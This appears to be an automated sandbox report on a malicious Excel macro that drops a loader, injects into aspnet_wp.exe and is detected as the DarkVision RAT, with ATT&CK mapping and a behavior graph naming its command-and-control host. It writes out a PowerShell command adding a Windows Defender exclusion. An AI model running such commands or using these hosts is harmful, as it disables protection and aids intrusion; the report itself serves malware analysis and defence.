                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400326F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000001400326F4
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FF6E44A1180 Sleep,Sleep,SetUnhandledExceptionFilter,28_2_00007FF6E44A1180
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CCD5F0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FFC9CCD5F0C
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CF152BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FFC9CF152BC
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 33_2_00007FF6E44A1180 Sleep,Sleep,SetUnhandledExceptionFilter,33_2_00007FF6E44A1180

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"Jump to behavior
                          Allocates memory in foreign processes
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 protect: page execute and read and write
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 protect: page execute and read and write
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 value starts with: 4D5A
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 value starts with: 4D5A
                          Modifies the context of a thread in another process (thread injection)
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeThread register set: target process: 7640Jump to behavior
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeThread register set: target process: 8476
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeThread register set: target process: 8636
                          Writes to foreign memory regions
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140001000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140039000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140045000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140076000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140078000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140079000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 3798345010Jump to behavior
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140001000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140039000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140045000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140076000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140078000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140079000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 4788F94010
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140001000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140039000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140045000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140076000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140078000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140079000
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: C516BBB010
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: GetLocaleInfoEx,12_2_00007FFC9CCBFEC0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: GetLocaleInfoEx,12_2_00007FFC9CEF6860
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: GetLocaleInfoEx,28_2_00007FFC9CC0FEC0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: GetLocaleInfoEx,28_2_00007FFC9CE46860
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD864DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00007FFC9CD864DC
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140027330 LocalAlloc,LoadLibraryW,GetProcAddress,GetUserGeoID,gethostname,gethostbyname,GetUserNameW,GetTickCount64,16_2_0000000140027330
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140030F3C HeapCreate,GetVersion,HeapSetInformation,16_2_0000000140030F3C

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DarkVision Rat
                          Source: Yara matchFile source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1537027703.0000021BC506A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.1452878031.000001FF21000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.1315965400.000002333C86A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1537278105.0000025C5A000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1537027703.0000021BC5000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.1452878031.000001FF2106A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.1315965400.000002333C800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.1453587554.0000023FB6000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: PO202502DAKE.exe PID: 7440, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 7640, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: PO202502DAKE.exe PID: 8408, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 8476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: PO202502DAKE.exe PID: 8572, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 8636, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected DarkVision Rat
                          Source: Yara matchFile source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1537027703.0000021BC506A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.1452878031.000001FF21000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.1315965400.000002333C86A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1537278105.0000025C5A000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1537027703.0000021BC5000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.1452878031.000001FF2106A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.1315965400.000002333C800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.1453587554.0000023FB6000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: PO202502DAKE.exe PID: 7440, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 7640, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: PO202502DAKE.exe PID: 8408, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 8476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: PO202502DAKE.exe PID: 8572, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 8636, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information52
                          Scripting                          		Valid Accounts2
                          Native API                          		52
                          Scripting                          		1
                          DLL Side-Loading                          		2
                          Disable or Modify Tools                          		OS Credential Dumping1
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts13
                          Exploitation for Client Execution                          		1
                          DLL Side-Loading                          		1
                          Access Token Manipulation                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory1
                          Account Discovery                          		Remote Desktop ProtocolData from Removable Media11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          Browser Extensions                          		411
                          Process Injection                          		13
                          Obfuscated Files or Information                          		Security Account Manager2
                          File and Directory Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCron1
                          Registry Run Keys / Startup Folder                          		1
                          Registry Run Keys / Startup Folder                          		1
                          DLL Side-Loading                          		NTDS24
                          System Information Discovery                          		Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                          Masquerading                          		LSA Secrets111
                          Security Software Discovery                          		SSHKeylogging313
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                          Virtualization/Sandbox Evasion                          		Cached Domain Credentials1
                          Process Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Access Token Manipulation                          		DCSync31
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
                          Process Injection                          		Proc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          Regsvr32                          		/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1635002 Sample: PO202503D.xlsm Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 78 myasyncrat.ddns.net 2->78 80 star-azurefd-prod.trafficmanager.net 2->80 82 5 other IPs or domains 2->82 92 Suricata IDS alerts for network traffic 2->92 94 Found malware configuration 2->94 96 Malicious sample detected (through community Yara rule) 2->96 100 19 other signatures 2->100 9 EXCEL.EXE 224 60 2->9         started        14 cmd.exe 2->14         started        16 cmd.exe 2->16         started        signatures3 98 Uses dynamic DNS services 78->98 process4 dnsIp5 86 f004.backblazeb2.com 149.137.128.16, 443, 49722 ZOOM-VIDEO-COMM-ASUS United States 9->86 88 s-part-0032.t-0009.t-msedge.net 13.107.246.60, 443, 49737, 49738 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 9->88 72 C:\Users\user\Desktop\~$PO202503D.xlsm, data 9->72 dropped 74 C:\Users\user\AppData\...\PO202502DAKE.zip, Zip 9->74 dropped 76 C:\Users\user\AppData\...\invoice_log.txt, ASCII 9->76 dropped 112 Office process queries suspicious COM object (likely to drop second stage) 9->112 18 PO202502DAKE.exe 1 8 9->18         started        22 7z.exe 6 9->22         started        24 regsvr32.exe 9->24         started        26 PO202502DAKE.exe 14->26         started        28 conhost.exe 14->28         started        30 PO202502DAKE.exe 16->30         started        32 conhost.exe 16->32         started        file6 signatures7 process8 file9 56 C:\Users\user\SystemRootDoc\msvcp290.dll, PE32+ 18->56 dropped 58 C:\Users\user\SystemRootDoc\libcares-2.dll, PE32+ 18->58 dropped 60 C:\Users\user\...\PO202502DAKE.exe, PE32+ 18->60 dropped 62 C:\Users\user\...\nasrallah_x86.dll, data 18->62 dropped 102 Writes to foreign memory regions 18->102 104 Allocates memory in foreign processes 18->104 106 Modifies the context of a thread in another process (thread injection) 18->106 108 Adds a directory exclusion to Windows Defender 18->108 34 powershell.exe 23 18->34         started        37 aspnet_wp.exe 2 1 18->37         started        40 conhost.exe 18->40         started        64 C:\Users\user\AppData\Local\...\msvcp290.dll, PE32+ 22->64 dropped 66 C:\Users\user\AppData\...\libcares-2.dll, PE32+ 22->66 dropped 68 C:\Users\user\AppData\...\PO202502DAKE.exe, PE32+ 22->68 dropped 70 2 other malicious files 22->70 dropped 42 conhost.exe 22->42         started        110 Injects a PE file into a foreign processes 26->110 44 conhost.exe 26->44         started        46 aspnet_wp.exe 26->46         started        48 conhost.exe 30->48         started        50 aspnet_wp.exe 30->50         started        signatures10 process11 dnsIp12 90 Loading BitLocker PowerShell Module 34->90 52 conhost.exe 34->52         started        54 WmiPrvSE.exe 34->54         started        84 myasyncrat.ddns.net 84.38.129.34, 3369, 49730, 49731 DATACLUB-NL Latvia 37->84 signatures13 process14

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.